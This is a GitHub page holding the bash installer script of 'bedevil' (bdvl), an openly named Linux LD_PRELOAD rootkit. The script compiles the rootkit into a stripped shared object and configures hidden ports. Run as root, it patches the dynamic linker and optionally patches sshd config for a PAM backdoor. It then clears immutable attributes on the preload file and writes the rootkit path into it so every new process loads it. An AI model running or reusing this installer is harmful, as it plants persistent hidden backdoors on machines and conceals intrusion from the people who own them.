forked from attackgithub/bdvl
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathbedevil.sh
executable file
·202 lines (174 loc) · 6.5 KB
/
bedevil.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
#!/bin/bash
tty -s && clear && [ -f .ascii ] && \
printf "\e[1m\e[31m`cat .ascii`\e[0m\n"
# contains functions for getting random stuff. see for more info.
source ./etc/random.sh
# contains a bunch of miscellaneous functions. see for more info.
source ./etc/util.sh
# default values for necessary variables.
source ./etc/defaults.sh
# contains, mainly, functions for use with dialog.
# 'show_yesno' checks for dialog support/use and shows
# input prompt depending on whether or not we can/want to use
# dialog.
source ./etc/dialog.sh
# handles (automatic?) reading & writing of/to 'toggles.h'
source ./etc/toggles.sh
# functions for fetching essential rootkit header
# directories & paths included by includes.h
source ./etc/headers.sh
# functions responsible for locating & writing
# arrays within rootkit include directories.
source ./etc/arrays.sh
# the functions within this script handle setting up
# ports & ranges to be hidden before writing them
# to a destination.
source ./etc/hideports.sh
# the functions in this script are what makes the
# magic happen when it comes to finding & writing
# rootkit settings. the current system we have for
# this is no way near efficient enough.
# (IT'S SLOW AS HELL!!!!)
source ./etc/settings.sh
# what it sounds like. read for more info.
source ./etc/postinstall.sh
compile_bdvl(){
[ ! -d "$NEW_MDIR" ] && { \
eecho "'$NEW_MDIR' does not exist. Have you populated your new headers?"; \
exit; \
}
local warning_flags optimization_flags \
options linker_options linker_flags
warning_flags=(-Wall)
optimization_flags=(-O0 -g0)
options=(-fomit-frame-pointer -fPIC)
linker_options=(-Wl,--build-id=none)
linker_flags=(-ldl)
[ `toggle_enabled USE_CRYPT` == "true" ] && linker_flags+=(-lcrypt)
[ `toggle_enabled ACCEPT_USE_SSL` == "true" ] && linker_flags+=(-lssl)
[ $PLATFORM == "armv7l" ] && PLATFORM="v7l"
[ $PLATFORM == "armv6l" ] && PLATFORM="v6l"
local compile_reg="gcc -std=gnu99 ${optimization_flags[*]} $NEW_MDIR/bedevil.c ${warning_flags[*]} ${options[*]} \
-I$NEW_MDIR -shared ${linker_flags[*]} ${linker_options[*]} -o $BDVLSO.$PLATFORM"
local compile_m32="gcc -m32 -std=gnu99 ${optimization_flags[*]} $NEW_MDIR/bedevil.c ${warning_flags[*]} ${options[*]} \
-I$NEW_MDIR -shared ${linker_flags[*]} ${linker_options[*]} -o $BDVLSO.i686"
# only show gcc output if we want to output verbosely.
[ $VERBOSE == 1 ] && `$compile_reg`
[ $VERBOSE == 0 ] && `$compile_reg &>/dev/null`
strip $BDVLSO.$PLATFORM 2>/dev/null || { eecho "Couldn't strip $BDVLSO.$PLATFORM, exiting"; exit; }
secho "`lib_size $PLATFORM`"
[ $VERBOSE == 1 ] && `$compile_m32`
[ $VERBOSE == 0 ] && `$compile_m32 &>/dev/null`
strip $BDVLSO.i686 2>/dev/null || wecho "Couldn't strip $BDVLSO.i686, this is ok"
[ -f $BDVLSO.i686 ] && secho "`lib_size i686`"
}
install_bdvl(){
[ `id -u` != 0 ] && { \
eecho "Not root. Cannot continue..." && \
exit; \
}
secho "Starting full installation!\n"
wecho "All essential dependencies must be present!"
wecho "You can install them with '$0 -D' before continuing\n"
if [ -f "`bin_path xxd`" ]; then
local response="$(show_yesno "Patch dynamic linker libs?")"
if [ $response == 0 ]; then
necho "Patching dynamic linker libraries, please wait..."
LDSO_PRELOAD="`etc/patch_libdl.sh -op | tail -n 1`" # change default LDSO_PRELOAD to new
# preload file location.
secho "Finished patching dynamic linker"
fi; echo
else
eecho "Cannot patch the dynamic linker as xxd was not found."
eecho "Did you install your dependencies?? :^) ('$0 -D')"
eecho "Do this, then try again."
wecho "Press enter if you would like to continue anyway..."
read
fi
# get installation specific settings & compile rootkit
setup_configuration
compile_bdvl
# after successful compilation, copy rootkit shared object(s) to install dir
echo && necho "Installing to \$INSTALL_DIR ($INSTALL_DIR)"
[ ! -d $INSTALL_DIR ] && mkdir -p $INSTALL_DIR/
[ -f $BDVLSO.$PLATFORM ] && cp $BDVLSO.$PLATFORM $INSTALL_DIR/$BDVLSO.$PLATFORM
[ -f $BDVLSO.i686 ] && cp $BDVLSO.i686 $INSTALL_DIR/$BDVLSO.i686
[ "`toggle_enabled USE_PAM_BD`" == "true" ] && \
patch_sshdconfig
# setup the rootkit's installation directory before setting up the rootkit's preload file.
setup_home $INSTALL_DIR
# after installing the rootkit to its directory and enabling anything that may need it, we
# can go ahead with having every new process henceforth preload the rootkit.
necho "Writing \$SOPATH to \$LDSO_PRELOAD"
[ -f "$LDSO_PRELOAD" ] && chattr -ia $LDSO_PRELOAD &>/dev/null
echo -n "$SOPATH" > $LDSO_PRELOAD
secho "Installation complete!"
cleanup_bdvl
}
VERBOSE=0
USE_DIALOG=0
DOCOMPRESS=0
USAGE="
Usage: $0 [option(s)]
Options:
-h: Show this help message & exit.
-v: Output verbosely.
-e: Do an environment check. (RECOMMENDED)
-u: Enable use of 'dialog' throughout setup.
-t: Go through & switch rootkit toggles.
-C: Clean up installation/compilation mess.
-d: Configure rootkit headers & settings.
-z: After configuration has finished, compress the resulting
new include directory with gzip.
-c: Compile rootkit in current directory & exit.
-D: Install all potential required dependencies. (REQUIRES ROOT)
-i: Launch full installation of bedevil. (REQUIRES ROOT)
"
while getopts "hvuetCzdcDi?" opt; do
case "$opt" in
h)
echo "$USAGE"
exit
;;
v)
secho "Outputting verbosely"
VERBOSE=1
;;
u)
[ ! -f `bin_path dialog` ] && \
eecho "Could not find dialog..." || USE_DIALOG=1
;;
e)
etc/environ.sh
;;
t)
[ $USE_DIALOG == 1 ] && \
dialog_set_toggles || set_toggles
;;
z)
necho "Going to compress $NEW_MDIR once it is created"
DOCOMPRESS=1
;;
d)
setup_configuration
;;
c)
compile_bdvl
;;
C)
cleanup_bdvl
;;
i)
install_bdvl
exit
;;
D)
etc/install_deps.sh
;;
?)
echo "$USAGE"
exit
;;
esac
done
[ $OPTIND == 1 ] || [[ $1 != "-"* ]] && echo "$USAGE"